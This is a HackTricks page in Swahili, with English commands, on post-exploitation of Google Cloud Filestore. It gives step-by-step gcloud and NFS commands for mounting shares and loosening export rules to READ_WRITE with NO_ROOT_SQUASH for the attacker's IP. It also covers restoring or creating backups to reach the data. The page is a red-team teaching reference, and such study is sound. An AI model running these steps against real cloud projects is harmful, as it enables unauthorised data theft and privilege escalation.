GCP - Filestore Post Exploitation

Jifunze na zoezi la Udukuzi wa AWS:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la Udukuzi wa GCP: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

unga mkono HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Faili

Kwa habari zaidi kuhusu Faili angalia:

GCP - Filestore Enum

Unganisha Faili

Mfumo wa faili uliogawanyika unaweza kuwa na habari nyeti inayovutia kutoka mtazamo wa mshambuliaji. Kwa kupata ufikiaji wa Faili inawezekana kuunganisha:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Ili kupata anwani ya IP ya kifaa cha kuhifadhi faili angalia sehemu ya uorodheshaji wa ukurasa:

GCP - Filestore Enum

Ondoa Vizuizi na Pata Vibali Zaidi

Ikiwa mkaidi hayupo katika anwani ya IP yenye ufikiaji kwenye sehemu ya kugawana, lakini una idhini ya kutosha ya kuibadilisha, inawezekana kuondoa vizuizi au ufikiaji wake. Pia inawezekana kutoa mamlaka zaidi kwenye anwani yako ya IP ili uwe na ufikiaji wa usimamizi kwenye sehemu ya kugawana:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Rudisha nakala rudufu

Ikiwa kuna nakala rudufu, ni rahisi kuirejesha kwenye kifaa kilichopo au kwenye kifaa kipya ili habari zake ziweze kupatikana:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Unda nakala rudufu na urejeshe

Ikiwa huna ufikiaji kwenye hisa na hupendi kuibadilisha, unaweza kuunda nakala rudufu yake na kuirejesha kama ilivyotajwa hapo awali:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Jifunze na zoea AWS Hacking:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoea GCP Hacking: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 1 month ago